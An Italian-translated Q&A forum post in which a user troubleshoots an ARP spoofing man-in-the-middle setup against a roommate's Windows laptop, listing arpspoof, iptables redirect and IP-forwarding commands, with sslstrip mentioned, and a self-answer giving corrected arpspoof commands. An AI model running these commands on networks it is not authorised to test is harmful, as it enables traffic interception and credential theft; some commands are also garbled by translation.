Arp Spoofing che causa collegamenti droppati

3

Oggi ho tenuto una conferenza basata su Arp Spoofing. Tuttavia, non riesco a farlo funzionare.

Scenario:

Il mio laptop - running kali

Computer portatile target (coinquilino - con permesso) - esegue windows 8

Comandi inseriti nell'ordine:

  1. echo 1 > / Proc / sys / net / ipv4 / ip_forward
  2. iptables -t nat -A PREROUTING -p tcp -destinazione-porta 80 -j REDIRECT --to-port 1024
  3. arpspoof -i wlan0 -t 192.168.0.1 192.168.0.9
  4. arpspoof -i wlan0 -t 192.168.0.9 192.168.0.1

Tuttavia, al termine di questi comandi, la connessione sul computer target viene persa e non è possibile accedere a nessuna pagina Web.

Dopo aver provato a capirlo da solo, ho lanciato Wireshark e ho notato che la connessione è la seguente:

Target > host > sito Web > host - FERMA QUI.

Sto facendo fatica a capire perché il traffico non viene inoltrato alla destinazione quando l'ho abilitato?

Ho provato ad abilitare un programma di ascolto sulla porta (sslstrip) per vedere se questo era il problema, ma questo causa lo stesso problema.

EDIT: i comandi 3 e 4 sono stati perfomed in terminali separati

    
posta Dr.Pepper 10.02.2015 - 15:25
fonte

1 risposta

1

Da allora l'ho capito.

Arpspoof è cambiato in versione 2.4 da quando sono state scritte le esercitazioni che stavo leggendo.

Ho rimosso la voce IPTABLES.

Ho cambiato il comando 3 e 4 nel seguente modo:

  1. arpspoof -i wlan0 -t 192.168.0.9 -r 192.168.0.1
  2. arpspoof -i wlan0 -t 192.168.0.1 192.168.0.9

(nota la modifica nell'ordine e l'aggiunta del flag -r)

    
risposta data 10.02.2015 - 16:14
fonte

Leggi altre domande sui tag